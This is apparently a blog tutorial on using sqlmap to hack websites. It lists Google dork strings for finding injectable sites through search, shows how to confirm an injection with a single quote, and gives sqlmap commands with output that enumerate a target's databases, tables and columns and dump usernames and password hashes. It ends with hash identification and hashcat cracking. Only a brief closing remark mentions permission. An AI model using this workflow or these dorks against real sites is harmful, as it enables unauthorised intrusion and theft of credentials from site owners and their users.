2. Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
3. Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
4. Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
5. Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
6. Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry.
7. Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass.
8. Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
9. Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
10. Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
11. Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.

[Source: www.sqlmap.org]

Be considerate to the user who spends time and effort to put up a website and possibly depends on it to make his days end. Your actions might impact someone is a way you never wished for. I think I can’t make it anymore clearer.

So here goes:

Contents [hide]

• What is SQLMAP
• Features
• Step 1: Find a Vulnerable Website
  • Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website
  • Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection
    • Microsoft SQL Server
    • MySQL Errors
    • Oracle Errors
    • PostgreSQL Errors
• Step 2: List DBMS databases using SQLMAP SQL Injection
• Step 3: List tables of target database using SQLMAP SQL Injection
• Step 4: List columns on target table of selected database using SQLMAP SQL Injection
• Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection
• Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection
• Step 7: Cracking password
  • Step 7.a: Identify Hash type
  • Step 7.b: Crack HASH using cudahashcat
• Conclusion

Step 1: Find a Vulnerable Website

This is usually the toughest bit and takes longer than any other steps. Those who know how to use Google Dorks knows this already, but in case you don’t I have put together a number of strings that you can search in Google. Just copy paste any of the lines in Google and Google will show you a number of search results.

Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website

This list a really long.. Took me a long time to collect them. If you know SQL, then you can add more here.. Put them in comment section and I will add them here.

Google Dork string Column 1	Google Dork string Column 2	Google Dork string Column 3
inurl:item_id=	inurl:review.php?id=	inurl:hosting_info.php?id=
inurl:newsid=	inurl:iniziativa.php?in=	inurl:gallery.php?id=
inurl:trainers.php?id=	inurl:curriculum.php?id=	inurl:rub.php?idr=
inurl:news-full.php?id=	inurl:labels.php?id=	inurl:view_faq.php?id=
inurl:news_display.php?getid=	inurl:story.php?id=	inurl:artikelinfo.php?id=
inurl:index2.php?option=	inurl:look.php?ID=	inurl:detail.php?ID=
inurl:readnews.php?id=	inurl:newsone.php?id=	inurl:index.php?=
inurl:top10.php?cat=	inurl:aboutbook.php?id=	inurl:profile_view.php?id=
inurl:newsone.php?id=	inurl:material.php?id=	inurl:category.php?id=
inurl:event.php?id=	inurl:opinions.php?id=	inurl:publications.php?id=
inurl:product-item.php?id=	inurl:announce.php?id=	inurl:fellows.php?id=
inurl:sql.php?id=	inurl:rub.php?idr=	inurl:downloads_info.php?id=
inurl:index.php?catid=	inurl:galeri_info.php?l=	inurl:prod_info.php?id=
inurl:news.php?catid=	inurl:tekst.php?idt=	inurl:shop.php?do=part&id=
inurl:index.php?id=	inurl:newscat.php?id=	inurl:productinfo.php?id=
inurl:news.php?id=	inurl:newsticker_info.php?idn=	inurl:collectionitem.php?id=
inurl:index.php?id=	inurl:rubrika.php?idr=	inurl:band_info.php?id=
inurl:trainers.php?id=	inurl:rubp.php?idr=	inurl:product.php?id=
inurl:buy.php?category=	inurl:offer.php?idf=	inurl:releases.php?id=
inurl:article.php?ID=	inurl:art.php?idm=	inurl:ray.php?id=
inurl:play_old.php?id=	inurl:title.php?id=	inurl:produit.php?id=
inurl:declaration_more.php?decl_id=	inurl:news_view.php?id=	inurl:pop.php?id=
inurl:pageid=	inurl:select_biblio.php?id=	inurl:shopping.php?id=
inurl:games.php?id=	inurl:humor.php?id=	inurl:productdetail.php?id=
inurl:page.php?file=	inurl:aboutbook.php?id=	inurl:post.php?id=
inurl:newsDetail.php?id=	inurl:ogl_inet.php?ogl_id=	inurl:viewshowdetail.php?id=
inurl:gallery.php?id=	inurl:fiche_spectacle.php?id=	inurl:clubpage.php?id=
inurl:article.php?id=	inurl:communique_detail.php?id=	inurl:memberInfo.php?id=
inurl:show.php?id=	inurl:sem.php3?id=	inurl:section.php?id=
inurl:staff_id=	inurl:kategorie.php4?id=	inurl:theme.php?id=
inurl:newsitem.php?num=	inurl:news.php?id=	inurl:page.php?id=
inurl:readnews.php?id=	inurl:index.php?id=	inurl:shredder-categories.php?id=
inurl:top10.php?cat=	inurl:faq2.php?id=	inurl:tradeCategory.php?id=
inurl:historialeer.php?num=	inurl:show_an.php?id=	inurl:product_ranges_view.php?ID=
inurl:reagir.php?num=	inurl:preview.php?id=	inurl:shop_category.php?id=
inurl:Stray-Questions-View.php?num=	inurl:loadpsb.php?id=	inurl:transcript.php?id=
inurl:forum_bds.php?num=	inurl:opinions.php?id=	inurl:channel_id=
inurl:game.php?id=	inurl:spr.php?id=	inurl:aboutbook.php?id=
inurl:view_product.php?id=	inurl:pages.php?id=	inurl:preview.php?id=
inurl:newsone.php?id=	inurl:announce.php?id=	inurl:loadpsb.php?id=
inurl:sw_comment.php?id=	inurl:clanek.php4?id=	inurl:pages.php?id=
inurl:news.php?id=	inurl:participant.php?id=
inurl:avd_start.php?avd=	inurl:download.php?id=
inurl:event.php?id=	inurl:main.php?id=
inurl:product-item.php?id=	inurl:review.php?id=
inurl:sql.php?id=	inurl:chappies.php?id=
inurl:material.php?id=	inurl:read.php?id=
inurl:clanek.php4?id=	inurl:prod_detail.php?id=
inurl:announce.php?id=	inurl:viewphoto.php?id=
inurl:chappies.php?id=	inurl:article.php?id=
inurl:read.php?id=	inurl:person.php?id=
inurl:viewapp.php?id=	inurl:productinfo.php?id=
inurl:viewphoto.php?id=	inurl:showimg.php?id=
inurl:rub.php?idr=	inurl:view.php?id=
inurl:galeri_info.php?l=	inurl:website.php?id=

Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection

For every string show above, you will get huundreds of search results. How do you know which is really vulnerable to SQLMAP SQL Injection. There’s multiple ways and I am sure people would argue which one is best but to me the following is the simplest and most conclusive.

Let’s say you searched using this string inurl:item_id= and one of the search result shows a website like this:

http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15

Just add a single quotation mark ' at the end of the URL. (Just to ensure, " is a double quotation mark and ' is a single quotation mark).

So now your URL will become like this:

http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'

If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirect you to a different page, move on to the next site in your Google search results page.

See example error below in the screenshot. I’ve obscured everything including URL and page design for obvious reasons.

Examples of SQLi Errors from Different Databases and Languages

Microsoft SQL Server

Server Error in ‘/’ Application. Unclosed quotation mark before the character string ‘attack;’.

Description: An unhanded exception occurred during the execution of the current web request. Please review the stack trace for more information about the error where it originated in the code.

Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string ‘attack;’.

MySQL Errors

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore.com/buystuff.php on line 12

Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’ at line 12

Oracle Errors

java.sql.SQLException: ORA-00933: SQL command not properly ended at oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)

Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated

PostgreSQL Errors

Query failed: ERROR: unterminated quoted string at or near “‘’’”

Step 2: List DBMS databases using SQLMAP SQL Injection

As you can see from the screenshot above, I’ve found a SQLMAP SQL Injection vulnerable website. Now I need to list all the databases in that Vulnerable database. (this is also called enumerating number of columns). As I am using SQLMAP, it will also tell me which one is vulnerable.

Run the following command on your vulnerable website with.

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs

In here:
sqlmap = Name of sqlmap binary file
-u = Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15”)
--dbs = Enumerate DBMS databases

See screenshot below.

This commands reveals quite a few interesting info:

web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'

So, we now have two database that we can look into. information_schema is a standard database for almost every MYSQL database. So our interest would be on sqldummywebsite database.

Step 3: List tables of target database using SQLMAP SQL Injection

Now we need to know how many tables this sqldummywebsite database got and what are their names. To find out that information, use the following command:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables

Sweet, this database got 8 tables.

[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info

and of course we want to check whats inside user_info table using SQLMAP SQL Injection as that table probably contains username and passwords.

Step 4: List columns on target table of selected database using SQLMAP SQL Injection

Now we need to list all the columns on target table user_info of sqldummywebsite database using SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy, run the following command:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns

This returns 5 entries from target table user_info of sqldummywebsite database.

[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)

AHA! This is exactly what we are looking for … target table user_login and user_password .

Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection

SQLMAP SQL Injection makes is Easy! Just run the following command again:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump

Guess what, we now have the username from the database:

[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes

Almost there, we now only need the password to for this user.. Next shows just that..

Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection

You’re probably getting used to on how to use SQLMAP SQL Injection tool. Use the following command to extract password for the user.

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump

TADA!! We have password.

[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+

But hang on, this password looks funny. This can’t be someone’s password.. Someone who leaves their website vulnerable like that just can’t have a password like that.

That is exactly right. This is a hashed password. What that means, the password is encrypted and now we need to decrypt it.

I have covered how to decrypt password extensively on this Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linuxpost. If you’ve missed it, you’re missing out a lot.

I will cover it in short here but you should really learn how to use hashcat.

Step 7: Cracking password

So the hashed password is 24iYBc17xK0e. . How do you know what type of hash is that?

Step 7.a: Identify Hash type

Luckily, Kali Linux provides a nice tool and we can use that to identify which type of hash is this. In command line type in the following command and on prompt paste the hash value:

hash-identifier

Excellent. So this is DES(Unix) hash.

Step 7.b: Crack HASH using cudahashcat

First of all I need to know which code to use for DES hashes. So let’s check that:

cudahashcat --help | grep DES

So it’s either 1500 or 3100. But it was a MYSQL Database, so it must be 1500.

I am running a Computer thats got NVIDIA Graphics card. That means I will be using cudaHashcat. On my laptop, I got an AMD ATI Graphics cards, so I will be using oclHashcat on my laptop. If you’re on VirtualBox or VMWare, neither cudahashcat nor oclhashcat will work. You must install Kali in either a persisitent USB or in Hard Disk. Instructions are in the website, search around.

I saved the hash value 24iYBc17xK0e. in DES.hash file. Following is the command I am running:

cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt

Interesting find: Usuaul Hashcat was unable to determine the code for DES hash. (not in it’s help menu). Howeverm both cudaHashcat and oclHashcat found and cracked the key.

Anyhow, so here’s the cracked password: abc123. 24iYBc17xK0e.:abc123

Sweet, we now even have the password for this user.

Conclusion

Thanks for reading and visiting my website.

There’s many other ways to get into a Database or obtain user information. You should practice such techniques on websites that you have permission to.

Please share and let everyone know how to test their websites using this technique.